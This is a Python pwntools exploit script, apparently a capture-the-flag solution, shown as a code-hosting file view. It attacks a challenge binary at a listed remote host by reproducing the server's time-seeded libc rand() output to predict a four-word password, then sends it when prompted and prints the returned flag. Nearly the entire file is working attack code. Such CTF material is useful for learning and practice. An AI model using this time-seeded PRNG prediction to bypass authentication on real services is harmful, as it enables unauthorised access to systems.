58 lines
1.2 KiB
Python
58 lines
1.2 KiB
Python
|
#!/usr/bin/python3
|
||
|
|
from pwn import *
|
||
|
|
from ctypes import *
|
||
|
|
import time
|
||
|
|
|
||
|
|
|
||
|
|
filename = "./cxxdition_rxxe"
|
||
|
|
libcname = "/lib/x86_64-linux-gnu/libc.so.6"
|
||
|
|
host = '116.198.216.209'
|
||
|
|
port = 23333
|
||
|
|
elf = context.binary = ELF(filename)
|
||
|
|
context.terminal = ['tmux', 'neww']
|
||
|
|
if libcname:
|
||
|
|
libc = ELF(libcname)
|
||
|
|
gs = '''
|
||
|
|
b main
|
||
|
|
'''
|
||
|
|
|
||
|
|
def start():
|
||
|
|
if args.GDB:
|
||
|
|
return gdb.debug(elf.path, gdbscript = gs)
|
||
|
|
elif args.REMOTE:
|
||
|
|
return remote(host, port)
|
||
|
|
else:
|
||
|
|
return process(elf.path)
|
||
|
|
|
||
|
|
|
||
|
|
lib_func = cdll.LoadLibrary(libcname)
|
||
|
|
seed = int(time.time() + 1)
|
||
|
|
lib_func.srand(seed)
|
||
|
|
passwd = [0, 0, 0, 0]
|
||
|
|
|
||
|
|
s = time.time()
|
||
|
|
for i in range(1000000):
|
||
|
|
passwd[i%4] ^= lib_func.rand()
|
||
|
|
e = time.time()
|
||
|
|
print(e-s)
|
||
|
|
payload = b''
|
||
|
|
payload += p32(passwd[0])
|
||
|
|
payload += p32(passwd[1])
|
||
|
|
payload += p32(passwd[2])
|
||
|
|
payload += p32(passwd[3])
|
||
|
|
p = start()
|
||
|
|
start_time = time.time()
|
||
|
|
while time.time() - start_time < 2:
|
||
|
|
|
||
|
|
x = p.recvline(timeout=0.1)
|
||
|
|
if b'flag{' in x:
|
||
|
|
print(x)
|
||
|
|
exit(0)
|
||
|
|
if b'Password' in x:
|
||
|
|
p.send(payload)
|
||
|
|
# if b"I'm tired. Take a nap!" in x:
|
||
|
|
# p.send(payload)
|
||
|
|
|
||
|
|
# elif b'Password' in x:
|
||
|
|
# p.send(payload*10)
|
||
|
|
exit(1)
|